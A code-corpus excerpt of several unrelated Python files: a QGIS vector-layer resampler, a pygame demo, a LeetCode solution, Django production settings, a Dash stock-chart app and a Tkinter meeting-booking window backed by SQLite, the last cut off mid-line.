attributeToUse: the field(s)/attribute(s) of the shapefile containing the quantity of interest (this gets disaggregated)\n :param inputIdField: the field/attribute of the input shapefile containing a unique identifier for each feature.\n :param weight_by: Field/attribute of the INPUT *AND* OUTPUT shapefile by which to weight disaggregated values.\n If field present in input shapefile, it is assumed to be the aggregated total. If not present,\n total is aggregated from the output shapefile, with consideration to intersected areas given.\n If no field specified, then intersected area used.\n :return: QgsVectorLayer that was added'''\n\n if self.outputLayer is None:\n raise Exception('Output shapefile must be set before adding any input vector layers')\n\n if type(startTime) is not type(dt.now()):\n raise ValueError('Start time must be a DateTime object')\n\n if startTime.tzinfo is None:\n raise ValueError('Start time must have a timezone attached')\n\n if type(shapefileInput) not in [str, QgsVectorLayer]:\n raise ValueError('Shapefile input (' + str(shapefileInput) + ') is not a string or QgsVectorLayer')\n\n if inputIdField is None:\n raise ValueError('ID field for input shapefile must be specified')\n\n # If shapefileInput is a QgsVectorLayer, then assume it is already in correct EPSG\n\n if type(shapefileInput) is str:\n if not os.path.exists(shapefileInput):\n raise ValueError('Shapefile (' + str(shapefileInput) + ') does not exist')\n\n # If the input layer isn't the same projection as the output layer, then produce a copy that's the right projection and use that instead\n reprojected = False\n if int(epsgCode) != self.templateEpsgCode:\n dest = reprojectVectorLayer(shapefileInput, self.templateEpsgCode)\n shapefileInput = dest\n reprojected = True\n\n # Load the layer\n try:\n vectorLayer = openShapeFileInMemory(shapefileInput, targetEPSG=self.templateEpsgCode)\n\n except Exception as e:\n raise ValueError('Could not load shapefile at ' + shapefileInput)\n\n try:\n # Try to delete tempfile but don't explode if fail as QGIS sometimes hangs onto them for slightly too long\n rmtree(os.path.dirname(dest))\n except:\n pass\n else:\n vectorLayer = shapefileInput\n\n # Resample layer\n if type(attributeToUse) is not list:\n attributeToUse = [attributeToUse]\n\n resampled = self.resampleLayer(vectorLayer, attributeToUse, weight_by, inputIdField)\n\n self.updateLayers(attributeToUse, resampled, startTime)\n vectorLayer = None # we are done with this\n return resampled\n\n def injectInput(self, shapefileInput, epsgCode, attributeToUse, startTime):\n ''' Inject a shapefile previously created by this object back in so no disaggregation has to happen\n :param shapefileInput: Filename of shapefile to be (dis)aggregated\n :param epsgCode: EPSG code of vector layer\n :param startTime: datetime() object: the date of the period represented by this shapefile's data. Time ignored.\n :param attributeToUse: the field(s)/attribute(s) of the shapefile containing the quantity of interest\n :return: QgsVectorLayer that was added'''\n\n if self.outputLayer is None:\n raise Exception('Output shapefile must be set before adding any input vector layers')\n\n if type(startTime) is not type(dt.now()):\n raise ValueError('Start time must be a DateTime object')\n\n if startTime.tzinfo is None:\n raise ValueError('Start time must have a timezone attached')\n\n if type(shapefileInput) not in [str, str]:\n raise ValueError('Shapefile input (' + str(shapefileInput) + ') is not a string filename')\n\n if not os.path.exists(shapefileInput):\n raise ValueError('Shapefile (' + str(shapefileInput) + ') does not exist')\n\n # Load the layer straight from disk as we won't be making any modifications to it\n try:\n vectorLayer = loadShapeFile(shapefileInput)\n except Exception as e:\n raise ValueError('Could not load shapefile at ' + shapefileInput)\n\n if type(attributeToUse) is not list:\n attributeToUse = [attributeToUse]\n\n self.updateLayers(attributeToUse, vectorLayer, startTime)\n return vectorLayer\n\n def updateLayers(self, attributeToUse, layer, startTime):\n # Places the vector layer and its attributes into pandas series\n # Extract attributes table so it doesn't have to be done later\n satts = shapefile_attributes(layer)\n # Make sure table is indexed by what the user wanted\n satts.index = list(map(intOrString, satts[self.templateIdField].loc[satts.index.tolist()]))\n\n if self.dataLayers is None:\n # Instantiate new time series of vector layers, make a copy of attributes table and record which attribute(s) are of interest\n self.dataLayers = pd.Series([layer], index=[startTime])\n self.attributeTables = pd.Series([satts.copy()], index=[startTime])\n self.attribute = pd.Series([attributeToUse], index=[startTime])\n else:\n # Append to existing time series, and ensure time series still chronological\n self.dataLayers[startTime] = layer\n self.dataLayers = self.dataLayers.sort_index()\n # Extract attributes table\n self.attributeTables[startTime] = satts.copy()\n self.attributeTables = self.attributeTables.sort_index()\n # Record attribute(s) of interest\n self.attribute[startTime] = attributeToUse\n self.attribute = self.attribute.sort_index()\n\n return layer\n\n # def getValueForFeatureId(self, attribute, featureId, layer):\n # # Returns the value of the specified <> (string) for a QgsVectorLayer <>\n # # for featureId in that layer. Any wrongness causes an exception\n # return shapefile_attributes(layer[attribute][featureId])\n\n def getTableForDate(self, requestDate):\n ''' Return pandas data frame of values for each feature ID on the requested datetime '''\n #tic = dt.now()\n if type(requestDate) is not type(dt.now()):\n raise ValueError('Request date must be DateTime object')\n\n if requestDate.tzinfo is None:\n raise ValueError('Request datetime must have a timezone attached')\n\n layer_idx = self.attributeTables.index[0] if self.attributeTables.index.asof(requestDate) is np.nan else self.attributeTables.index.asof(requestDate)\n var_idx = self.attribute.index[0] if self.attribute.index.asof(requestDate) is np.nan else self.attribute.index.asof(requestDate)\n\n tbl = self.attributeTables[layer_idx]\n attrib = self.attribute[var_idx]\n\n # self.logger.addEvent('LayerLookup', requestDate.date(), layer_idx.date(), attrib,\n # 'Looked up ' + str(attrib) + ' in vector layer attributes for ' + requestDate.strftime('%Y-%m-%d') + '. Gave data for ' + str(layer_idx.strftime('%Y-%m-%d')))\n # toc = dt.now()\n # print 'Time taken for spatial lookup:' + str((toc-tic).microseconds/1000) + ' sec'\n # Just return the field(s) of interest\n return tbl[attrib]\n\n def getLayerForDate(self, requestDate):\n ''' Return resampled layer or value for a given date, and the attribute of interest (tuple) '''\n if type(requestDate) is not type(dt.now()):\n raise ValueError('Request date must be DateTime object')\n\n if requestDate.tzinfo is None:\n raise ValueError('Request datetime must have a timezone attached')\n\n layer_idx = self.dataLayers.index[0] if self.dataLayers.index.asof(requestDate) is np.nan else self.dataLayers.index.asof(requestDate)\n var_idx = self.attribute.index[0] if self.attribute.index.asof(requestDate) is np.nan else self.attribute.index.asof(requestDate)\n\n layer = self.dataLayers[layer_idx]\n attrib = self.attribute[var_idx]\n if (len(attrib)==1) and (type(attrib) is list): # More than one attrib can be returned, but return singleton if it's a list of 1\n attrib = attrib[0]\n\n # Record which shapefile was provided for this date\n #self.logger.addEvent('LayerLookup', requestDate.date(), layer_idx.date(), 'Not sure of param', 'Looked up shapefile for requestdate and returned one for actualDate')\n\n if type(layer) is not type(QgsVectorLayer()):\n # This is a single value. Return a layer populated with it\n newLayer = duplicateVectorLayer(self.outputLayer, targetEPSG=self.templateEpsgCode)\n # Add a field and pre-populate it with the same value always\n newLayer = addNewField(newLayer, attrib, initialValue=layer)\n return (newLayer, attrib)\n else:\n # Return the existing resampled layer\n return (layer, attrib)\n\n def getOutputFeatureAreas(self):\n # Returns a pandas array of output feature areas in m2\n areas = pd.Series(feature_areas(self.outputLayer))\n areas.index = self.featureMapper[areas.index]\n return areas\n\n def getAreas(self):\n # Return the area of each feature in square metres\n return self.areas\n\n def resampleLayer(self, inputLayer, fieldsToSample, weight_by, inputIdField):\n ''' Disaggregates the polygon properties named in from at self.outputLayer features\n :param qgsVectorLayer with data to disaggregate:\n :param List of fields that should be downscaled spatially:\n :param Attribute of the OUTPUT shapefile by which to weight the resampled values that fall in the same input feature.\n *** value extracted from each inputLayer polygon will be multiplied by the fraction of that polygon intersected\n :param inputIdField: Field name of INPUT layer that contains unique identifiers for each entry\n :return: resampled layer\n '''\n\n # Make sure the fields to sample are actually present in the file. Throw exception if not\n extantFields = get_field_names(inputLayer)\n missing = list(set(fieldsToSample).difference(extantFields))\n if len(missing) > 0:\n raise ValueError('The input shapefile %s is missing the following attributes: %s'%(str(inputLayer.dataProvider().dataSourceUri()), str(fieldsToSample)))\n\n # Create spatial index: assume input layer has more features than output\n inputIndex = QgsSpatialIndex()\n\n # Determine which input features intersect the bounding box of the output feature,\n # then do a real intersection.\n for feat in inputLayer.getFeatures():\n inputIndex.insertFeature(feat)\n\n # If the inputLayer and outputLayer spatial units are the same, then disaggregation does not need to happen.\n if sameFeatures(inputLayer, self.outputLayer):\n return inputLayer\n\n # record what was used to label features\n #if self.logger is not None:\n # self.logger.addEvent('Disagg', None, None, None, 'Resampling fields ' + str(fieldsToSample) + ', weighting by ' + str(weight_by))\n\n # Clone the output layer (populate this with [dis]aggregated data)\n newShapeFile = duplicateVectorLayer(self.outputLayer, targetEPSG=self.templateEpsgCode)\n # Keep track of which field name has which field index\n\n fieldIndices = {}\n newShapeFile.startEditing()\n existingFields = get_field_names(self.outputLayer)\n numFields = len(newShapeFile.dataProvider().fields())\n numFieldsAdded = 0\n\n for field in fieldsToSample:\n if field in existingFields:\n fieldIndices[field] = existingFields.index(field)\n else:\n newShapeFile.addAttribute(QgsField(field, QVariant.Double))\n newShapeFile.updateFields()\n fieldIndices[field] = numFields + numFieldsAdded\n numFieldsAdded += 1\n\n newShapeFile.commitChanges()\n newShapeFile.updateExtents()\n\n # Get read-across between so feature ID can be ascertained from name according to chosen ID field\n t = shapefile_attributes(newShapeFile)[self.templateIdField]\n def intorstring(x):\n try:\n return int(x)\n except:\n return str(x)\n\n readAcross = pd.Series(index=list(map(intorstring, t.values)), data=list(map(intorstring, t.index)))\n t = None\n\n # Get areas of input shapefile intersected by output shapefile, and proportions covered, and attribute vals\n intersectedAreas = intersecting_amounts(fieldsToSample, inputIndex, inputLayer, newShapeFile, inputIdField, self.templateIdField)\n\n # Work out disaggregation factor baed on area intersected\n # Use \"big\" totals of weightings if the same attribute present in the input data file\n total_weightings = {} # Assume no \"big\" totals are available\n #if type(weight_by) not in [str, unicode]:\n # raise ValueError('Weighting attribute name not a string or unicode variable')\n\n if weight_by in get_field_names(inputLayer):\n atts = shapefile_attributes(inputLayer)[weight_by]\n total_weightings = {weight_by:{idx:atts[idx] for idx in atts.index}}\n self.logger.addEvent('Disagg', None, None, None, 'Found attribute ' + str(weight_by) + ' in shapefile to be disaggregated. '\n 'Assuming this is the sum of '+ str(weight_by) + ' in the output features')\n else:\n # It's not in the input file: Record what happened in the log\n if weight_by is not None:\n self.logger.addEvent('Disagg', None, None, None, 'Total of Weighting Attribute ' + str(weight_by) + ' not found in original shapefile, so calculating it from the output areas')\n else:\n self.logger.addEvent('Disagg', None, None, None, 'No weighting attribute specified so disaggregated weighting by intersected feature area only')\n\n if weight_by is None:\n disagg = disaggregate_weightings(intersectedAreas, newShapeFile, weight_by, total_weightings, self.templateIdField)['_AREA_']\n else:\n disagg = disaggregate_weightings(intersectedAreas, newShapeFile, weight_by, total_weightings, self.templateIdField)[weight_by]\n\n # Select successfully identified output areas\n\n newShapeFile.selectByIds(list(readAcross[list(disagg.keys())]))\n\n selectedOutputFeatures = newShapeFile.selectedFeatures()\n newShapeFile.startEditing()\n # Apply disaggregation to features\n for outputFeat in selectedOutputFeatures: # For each output feature\n # Select the relevant features from the input layer\n area_weightings = {inputAreaId: disagg[outputFeat[self.templateIdField]][inputAreaId] for inputAreaId in list(disagg[outputFeat[self.templateIdField]].keys())}\n # Calculate area-weighted average to get a single value for each output area\n for field in fieldsToSample:\n # The values to disaggregate in all regions touching this output feature\n input_values = {inputAreaId: intersectedAreas[outputFeat[self.templateIdField]][inputAreaId][field] for inputAreaId in list(intersectedAreas[outputFeat[self.templateIdField]].keys())}\n # If an output area is influenced by multiple input areas, and a subset of these is invalid,\n # assign them zero\n for i in list(input_values.keys()):\n try:\n input_values[i] = float(input_values[i])\n except:\n input_values[i] = 0\n # Combine values in all input regions touching this output feature. If disagg_weightings missed one out it's because no intersection or NULL data.\n # Any value intersecting an output area with NULL weighting will be excluded\n outputAreasToUse = set(input_values.keys()).intersection(list(area_weightings.keys()))\n weighted_average = np.sum(np.array([input_values[in_id] * float(area_weightings[in_id]) for in_id in list(outputAreasToUse)]))\n\n newShapeFile.changeAttributeValue(outputFeat.id(), fieldIndices[field], float(weighted_average))\n\n newShapeFile.commitChanges()\n newShapeFile.selectByIds([]) # De-select all features\n return newShapeFile\n\n def addInput(self, input, startTime, attributeToUse, inputFieldId, weight_by=None, epsgCode=None):\n ''' Add a layer of data for a specific time. Must be QgsVectorLayer OR a float (represents all space), indexed by unique area ID.\n Unique area IDs must correspond to features in the spatial layer\n Parameters:\n # input: The QgsVectorLayer or float() object\n # epsgCode: Numeric EPSG code of layer (can be None)\n # startTime: The start of the period represented by this data (datetime() object)\n # attributeToUse: The attribute(s) (field(s)) to use as input data. Other fields will be ignored\n # inputFieldId: The attribute(s) (field(s)) that contains unique identifiers for each input field\n # weight_by: Attribute of the OUTPUT shapefile by which to weight the resampled values. '''\n if type(startTime) is not type(dt.now()):\n raise ValueError('Start time must be a DateTime object')\n\n if startTime.tzinfo is None:\n raise ValueError('Start time must have a timezone attached')\n\n if type(attributeToUse) is not type(list()):\n attributeToUse = [attributeToUse]\n\n if type(input) is type(float()): # Assume a single value for all space\n return self.dealWithSingleValue(input, startTime, 'SINGLEVAL')\n\n if type(input) is type(''): # Assume a filename\n if epsgCode is None:\n raise ValueError('EPSG code must be provided if a shapefile is input')\n return self.dealWithVectorLayer(input, epsgCode, startTime, attributeToUse, weight_by, inputFieldId)\n\n if type(input) is QgsVectorLayer:\n return self.dealWithVectorLayer(input, epsgCode, startTime, attributeToUse, weight_by, inputFieldId)\n\n raise ValueError('Error setting input layer for ' + str(startTime) + ': input was neither string nor float')","sub_path":"GQF/DataManagement/SpatialTemporalResampler.py","file_name":"SpatialTemporalResampler.py","file_ext":"py","file_size_in_byte":24637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"71685334","text":"import pygame\n### 초기화\npygame.init() #초기화\n#화면크기설정\nscreen_width = 480\nscreen_height = 640\nscreen = pygame.display.set_mode((screen_width,screen_height))\n#타이틀\npygame.display.set_caption(\"pygame1\")\n#FPS설정\nclock = pygame.time.Clock()\n### 초기화\n\n### 사용자 초기화\n# 배경이미지불러오기\nbackground = pygame.image.load(\"background1.png\")\n# sprite -캐릭터- 불러오기\ncharacter = pygame.image.load(\"character1.png\")\ncharacter_size = character.get_rect().size #캐릭터 이미지의 크기\ncharacter_width = character_size[0] #캐릭터 가로크기\ncharacter_height = character_size[1] # 캐릭터 세로크기\ncharacter_x_pos = (screen_width-character_width)/2 # 캐릭터 x좌표\ncharacter_y_pos = screen_height-character_height #캐릭터 y좌표\n# sprite - 적\nenemy = pygame.image.load(\"enemy1.png\")\nenemy_size = enemy.get_rect().size #캐릭터 이미지의 크기\nenemy_width = enemy_size[0] #캐릭터 가로크기\nenemy_height = enemy_size[1] # 캐릭터 세로크기\nenemy_x_pos = (screen_width-enemy_width)/2 # 캐릭터 x좌표\nenemy_y_pos = (screen_height-enemy_height)/2 #캐릭터 y좌표\n# 이동좌표\nto_x = 0\nto_y = 0\n#이동속도\ncharacter_speed = 0.5\n#폰트정의\ngame_font = pygame.font.Font(None, 40) #폰트 객체 생성 및 폰트 크기 설정\n#총 시간\ntotal_time = 10\n#시작계산\nstart_ticks = pygame.time.get_ticks() #시작틱스 정보 받아오기\n### 사용자초기화\n\n###이벤트루프\nrunning = True #게임진행 중인지\nwhile running:\n dt = clock.tick(30) # 게임화면의 초당 프레임수 30-60\n for event in pygame.event.get():#어떤 이벤트가 발생했는가\n if event.type == pygame.QUIT: #창 닫히는 이벤트의 발생\n running = False #게임 진행중이 아님\n if event.type == pygame.KEYDOWN: #키 눌러짐 확인\n # 키\n left = event.key == pygame.K_LEFT\n right = event.key == pygame.K_RIGHT\n up = event.key == pygame.K_UP\n down = event.key == pygame.K_DOWN\n if left: #방향키 좌\n to_x -= character_speed\n if right:# 방향키 우\n to_x += character_speed\n if up: # 방향키 위\n to_y -= character_speed\n if down: #방향키 아래\n to_y += character_speed\n if event.type == pygame.KEYUP:\n if left or right:\n to_x = 0\n if up or down:\n to_y = 0\n ###위치처리\n #좌표변경\n character_x_pos += to_x*dt\n character_y_pos += to_y*dt\n # 캐릭터의 위치범위\n char_x_minimum = 0\n char_x_maximum = screen_width-character_width\n char_y_minimum = 0\n char_y_maximum = screen_height-character_height\n \n #가로 경계값 처리\n if character_x_pos < char_x_minimum:\n character_x_pos = char_x_minimum\n elif character_x_pos > char_x_maximum:\n character_x_pos = char_x_maximum\n #세로 경계값 처리\n if character_y_pos < char_y_minimum:\n character_y_pos = char_y_minimum\n elif character_y_pos > char_y_maximum:\n character_y_pos = char_y_maximum\n ###\n\n ###충돌처리\n character_rect = character.get_rect()\n character_rect.left = character_x_pos\n character_rect.top = character_y_pos\n enemy_rect = enemy.get_rect()\n enemy_rect.left = enemy_x_pos\n enemy_rect.top = enemy_y_pos\n\n #충돌처리 업데이트\n if character_rect.colliderect(enemy_rect):\n print(\"총돌\")\n running = False\n ### \n ### 화면그리기\n #screen.fill((0,0,255))\n screen.blit(background,(0,0)) #배경그리기\n screen.blit(character,(character_x_pos, character_y_pos))#캐릭터그리기\n screen.blit(enemy,(enemy_x_pos, enemy_y_pos))#적그리기\n #타이머 그려넣기\n #경과시간 계산\n elapsed_time = (pygame.time.get_ticks()-start_ticks)/1000 #경과시간(ms->s)\n #잔여시간\n remain_time = int(total_time-elapsed_time)\n #출력내용 True 색상\n timer = game_font.render(str(remain_time), True, (255,255,255))\n screen.blit(timer, (10,10))\n # 남은시간 0이하면 게임종료(시간초과)\n if remain_time ==0:\n running = False\n #게임화면 다시그리기\n pygame.display.update() \n ### \n### 게임종료\n#잠시대기\npygame.time.delay(2000) #2000ms=2s 대기\n#pygame 종료\npygame.quit()\n###","sub_path":"8_frame.py","file_name":"8_frame.py","file_ext":"py","file_size_in_byte":4446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"190188417","text":"import copy\n\n\nclass Solution:\n def minFallingPathSum(self, A) -> int:\n m, n = len(A), len(A[0])\n dp = [[0 for i in range(n)] for j in range(m)]\n dp = copy.deepcopy(A)\n\n for i in range(1, m):\n for j in range(n):\n dp[i][j] = dp[ i -1][j]\n if j- 1 >= 0:\n dp[i][j] = min(dp[i][j], dp[i - 1][j - 1])\n if j + 1 < n:\n dp[i][j] = min(dp[i][j], dp[i - 1][j + 1])\n dp[i][j] += A[i][j]\n\n return min(dp[-1])\n\n\n\n\n","sub_path":"LeetcodeNew/python/LC_931.py","file_name":"LC_931.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"239408664","text":"import os\n\nfrom .base import *\n\nDEBUG = False\nALLOWED_HOSTS = [os.environ['DOMAIN']]\n\nINSTALLED_APPS += (\n 'storages',\n 'custom_storages',\n)\n\nSECRET_KEY = os.environ['SECRET_KEY']\n\nAWS_S3_ACCESS_KEY_ID = os.environ['AWS_S3_ACCESS_KEY_ID']\nAWS_S3_SECRET_ACCESS_KEY = os.environ['AWS_S3_SECRET_ACCESS_KEY']\nAWS_S3_FILE_OVERWRITE = False\nAWS_STATIC_STORAGE_BUCKET_NAME = os.environ['AWS_STATIC_STORAGE_BUCKET_NAME']\nAWS_MEDIA_STORAGE_BUCKET_NAME = os.environ['AWS_MEDIA_STORAGE_BUCKET_NAME']\nAWS_S3_ENCRYPTION = True\nAWS_STATIC_S3_CUSTOM_DOMAIN = '{}.s3.amazonaws.com'.format(AWS_STATIC_STORAGE_BUCKET_NAME)\nAWS_MEDIA_S3_CUSTOM_DOMAIN = '{}.s3.amazonaws.com'.format(AWS_MEDIA_STORAGE_BUCKET_NAME)\nAWS_IS_GZIPPED = True\nAWS_S3_URL_PROTOCOL = 'https:'\nAWS_AUTO_CREATE_BUCKET = False\n\nSTATIC_URL = 'https://{}/'.format(AWS_STATIC_S3_CUSTOM_DOMAIN)\nMEDIA_URL = 'https://{}/'.format(AWS_MEDIA_S3_CUSTOM_DOMAIN)\n\nSTATICFILES_STORAGE = 'custom_storages.StaticStorage'\nDEFAULT_FILE_STORAGE = 'custom_storages.MediaStorage'\n","sub_path":"web/adoption_stories/adoption_stories/environment_settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"623510565","text":"import dash, json, os, datetime, dash_table\nimport plotly.graph_objects as go\nimport pandas as pd\nimport dash_core_components as dcc\nimport dash_bootstrap_components as dbc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output \nfrom app import app\nfrom plotly.subplots import make_subplots\nfrom plotly.validators.layout import _hoverdistance\n\n\ndef loadJSON(some_json):\n import json\n with open(some_json, 'r') as content:\n data = json.load(content)\n return (data)\ndef jsonTOdict(some_list):\n import datetime\n mainrow = []\n for i in range(len(some_list)):\n for j in some_list[i]['candles']:\n row = []\n row.extend((some_list[i]['symbol'], \n j['open'], j['high'], j['low'], \n j['close'], j['volume'],\n datetime.date.fromtimestamp(j['datetime']/1000)))\n mainrow.append(row)\n return(mainrow)\n \ndat = loadJSON('C:\\\\Users\\\\alfre\\\\Desktop\\\\dash-apps\\\\update\\\\Stocks\\\\stockScreen.json')\ndata = jsonTOdict(dat)\nstock = pd.DataFrame(data, columns=['Stock', 'Open', 'High','Low', 'Close', 'Volume', 'Date'])\n\nsymbols = sorted(pd.unique(stock['Stock']))\n\nperiodDict = {'2 Months': 30, '3 Months': 90,'6 Months': 180,\n '1 Year': 365, '2 Years':730, '3 Years': 1095,}\n\n\n\n\n#Headers\nheaderLayout = html.Div(children=[\n html.H1(children=\"All Stocks at a Glance\", className= 'header-content'),],className='header')\n\nperiodFilterLayout = html.Div(children=[\n html.Div(children=\"Period\", className= 'menu-title'),\n dcc.Dropdown(id = \"period\",\n options=[{'label':period, 'value':period} for period in ('2 Months', '3 Months', '6 Months', '1 Year', '2 Years', '3 Years')],\n value='2 Months', className = 'filter-menus')], className='filter-menu2')\n\nnextButton= html.Div([\n dbc.Button(\"Next\", id=\"next-Button\", className=\"mr-2\"),\n html.Span(id=\"next-output\", style={\"vertical-align\": \"center\"})])\n\nprevButton=html.Div([\n dbc.Button(\"Previous\", id=\"prev-Button\", className=\"mr-2\"),\n html.Span(id=\"prev-output\", style={\"vertical-align\": \"center\"})])\n\nholdButton=html.Div([\n dbc.Button(\"Hold\", id=\"hold-Button\", className=\"mr-2\"),\n html.Span(id=\"hold-output\", style={\"vertical-align\": \"center\"})])\n\nmenuLayout = html.Div(children=[periodFilterLayout, prevButton, nextButton], className='menu')\n\npriceVolumeChartLayout = html.Div(children=dcc.Graph(id=\"priceVolume-chart\", config={\"displayModeBar\": False}), className='card')\ngraphLayout = html.Div(children=[priceVolumeChartLayout], className = 'wrapper')\n\nlayout = html.Div(children=[headerLayout, menuLayout, graphLayout])\n\n\n\n@app.callback(Output('priceVolume-chart', 'figure'),\n [\n Input(\"next-Button\", \"n_clicks\"),\n Input(\"prev-Button\", \"n_clicks\"),\n #Input(\"hold-Button\", \"n_clicks\"),\n Input(\"period\", \"value\"),],)\n\ndef update_graph(nxt, prv, per):\n def chartGlobalStocks(nxt, prv, per):\n \n \n stckSeries=symbols\n seriesSize = len(stckSeries)\n ind=0\n try:\n ind += nxt\n except TypeError:\n pass\n try:\n ind -= prv\n except TypeError:\n pass\n symb = stckSeries[ind%seriesSize]\n per_ = periodDict[per]\n filtered_data = stock[stock['Stock'] == stckSeries[ind%seriesSize]]\n print(filtered_data)\n filtered_data = filtered_data.iloc[-per_ :]\n fig = make_subplots(rows=2, cols=1)\n fig.add_trace(go.Scatter(x=filtered_data['Date'], y=filtered_data['Low']), row=1, col=1)\n fig.add_trace(go.Scatter(x=filtered_data[\"Date\"], y=[filtered_data['Low'].mean()]*len(filtered_data['Low']), name='avg',line=dict(color='firebrick', width=1.5,dash='dash')),)\n fig.add_trace(go.Scatter(x=filtered_data['Date'], y=filtered_data['Volume']), row=2, col=1)\n fig.add_trace(go.Bar(x=filtered_data['Date'], y=filtered_data['Volume']), row=2, col=1)\n fig.update_layout(\n #hoverdistance = 0,\n height=800, \n #width=1000, \n title_text= str(stckSeries[ind%seriesSize]), template=\"plotly_white\", showlegend=False)\n# fig.update_yaxes(showgrid=False, zeroline=False, showticklabels=False,\n# showspikes=True, spikemode='across', spikesnap='cursor', showline=False, spikedash='solid')\n# \n# fig.update_xaxes(showgrid=False, zeroline=False, rangeslider_visible=False, showticklabels=False,\n# showspikes=True, spikemode='across', spikesnap='cursor', showline=False, spikedash='solid')\n return fig \n \n x = chartGlobalStocks(nxt, prv, per)\n return(x)\n\n\n \n \n \n \n \n \n \n \n","sub_path":"insight/apps/global_.py","file_name":"global_.py","file_ext":"py","file_size_in_byte":4772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"495035824","text":"import tkinter as tk # create basic Graphical User Interface elements\nimport calendar # get relevant dates\nimport datetime # get current time\nfrom functools import partial\nimport sqlite3 # database operations\n\nfrom Book_Meeting import BookMeeting\n\n\ndbConnection = sqlite3.connect('AmbassadorDatabase3.db') # Passes name of the database to connect() method\ndbCursor = dbConnection.cursor() # Create cursor object using the connection returned from connect method\n\n\nclass BookHub:\n def __init__(self, master, nameResult, ID):\n self.master = master\n self.master.geometry('1240x616')\n self.master.title('Booking Hub')\n\n self.windowFrame = tk.Frame(self.master, bg = 'lightgreen')\n self.windowFrame.grid()\n self.nameResult = nameResult\n self.ID = ID\n\n self.name = str(self.nameResult).replace(\"\\'\",\"\").replace(\"(\",\"\").replace(\")\",\"\").replace(',',\"\")\n self.Title = tk.Label(self.windowFrame, text = (str(self.name) + \"'s Availability Schedule\"), font = ('Arial', 20,'bold'), bg = 'lightgreen')\n self.description = tk.Label(self.windowFrame, text = 'Please double click a time slot that works for you.', font = ('Arial', 15, 'bold'), bg ='lightgreen')\n self.Title.grid(row = 0, column = 1)\n self.description.grid(row = 1, column = 1)\n\n self.timetableFrame = tk.Frame(self.windowFrame, bg = 'red', width = 1200, height = 700)\n self.timetableFrame.grid(row = 4, column = 1)\n self.home = tk.Button(self.windowFrame, text = 'Quit', width = 50, highlightbackground = 'lightgreen', command = self.returnHome)\n self.home.grid(row = 5, column = 1)\n self.TAavailability = dbCursor.execute('''SELECT BeforeSchool, Breaktime, Lunchtime, AfterSchool FROM AmbassadorAvailability WHERE AmbassadorID = ?''', (self.ID,))\n self.availability = [[0 for days in range(5)] for times in range(4)] # create empty 2D array\n\n counter = 0\n for e in self.TAavailability.fetchone(): # gets the string for each ambassador, e.g. 'YYNYNNYNYNYN...'\n for i in range(5):\n self.availability[counter][i] = e[i]\n counter+= 1\n\n def double_click(button, event):\n row = int(button.grid_info()['row']) - 1\n column = int(button.grid_info()['column'])\n\n width = 248 # width of each label\n height = 133\n lowerboundX = 50 # x coordinate from very left of page\n lowerboundY = 150 # y coordinate at very top of timetable boxes\n\n x = event.x_root\n y = event.y_root\n column = 0\n\n global day\n global time\n\n\n if y < (lowerboundY+(2*height)):\n # centre y, equivalent of binary search, far faster than a FOR loop\n if y < (lowerboundY+(height)):\n time = 'BeforeSchool'\n else:\n time = 'Breaktime'\n else:\n if y < (lowerboundY+(3*height)):\n time = 'Lunchtime'\n else:\n time = 'AfterSchool'\n\n if x < (lowerboundX+(2*width)): # leftmost 2\n if x < (lowerboundX+(width)):\n day = 'Monday'\n column = 0\n else:\n day = 'Tuesday'\n column = 1\n else:\n if x < (lowerboundX+(4*width)):\n if x < (lowerboundX+(3*width)):\n day = 'Wednesday'\n column = 2\n else:\n day = 'Thursday'\n column = 3\n else:\n day = 'Friday'\n column = 4\n\n date = self.updatedDates[column][0] + \" \" + str(self.updatedDates[column][1])\n dbConnection.commit()\n self.openBookMeeting = tk.Toplevel(self.master) # opens first top level window\n self.app = BookMeeting(self.openBookMeeting, self.ID, self.name,\"Please enter your full name, class and email to book a meeting for \" + day + \" at \"+ time + \".\", date, day, time)\n\n self.rowCounter = 0\n self.columnCounter = 0\n self.updatedDates = []\n self.buttonCounter = 0\n\n self.colours = ['IndianRed1','yellow','CadetBlue1','OliveDrab1','PaleVioletRed1','tomato','yellow2','turquoise1','OliveDrab2','hot pink','firebrick1','gold','DeepSkyBlue2', 'green2', 'deep pink', 'firebrick3','goldenrod','RoyalBlue1', 'green3', 'DeepPink3']\n # loops through the colours for each day\n self.days = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday']\n self.times = ['Before School', 'Break Time', 'Lunch Time', 'After School']\n self.months = {1: 'January', 2: 'February', 3: 'March', 4: 'April', 5: 'May', 6: 'June', 7: 'July', 8: 'August', 9: \"September\", 10: 'October', 11: 'November', 12: 'December'}\n # dictionary to convert a counter into the relevant month\n\n self.today = datetime.date.today()\n self.nextMonday = self.today + datetime.timedelta(days=-self.today.weekday(), weeks=0) # gets next Monday's data, e.g. 2020-10-12\n self.lastDay = calendar.monthrange(2020,self.today.month) # gets the last day of the current month\n\n self.totalDayCounter = 0\n self.newMonthcounter = 0\n while self.totalDayCounter < 5:\n if (self.nextMonday.day + self.totalDayCounter) > self.lastDay[1]: # if the day is before the last day of the month\n try:\n self.updatedDates.append((self.months[self.nextMonday.month + 1], 1 + self.newMonthcounter)) # date resets to 1\n # appends the next 5 dates to the array\n except:\n self.updatedDates.append(('January', 1 + self.newMonthcounter)) # triggers if its December- end of the year\n # appends the next 5 dates to the array\n self.newMonthcounter += 1\n\n else:\n self.updatedDates.append((self.months[self.nextMonday.month], self.nextMonday.day + self.totalDayCounter))\n self.totalDayCounter += 1\n\n def handle_enter(button, event):\n button.config(relief = 'sunken')\n\n def handle_leave(button, event): # returns border back to normal\n button.config(relief = 'raised')\n\n for i in range(4): # create unique buttons and retrieves information\n for e in range(5): # same variable used to define 2D array; that there are 3 ambassadors\n\n if self.buttonCounter % 5 == 0: # if there is a need for a new row, every fifth button\n self.columnCounter = 0 # column resets to 0, otherwise continues to 5,6,7 etc.\n self.meetingTime = (self.days[self.columnCounter]+ ': ' + self.times[self.rowCounter] 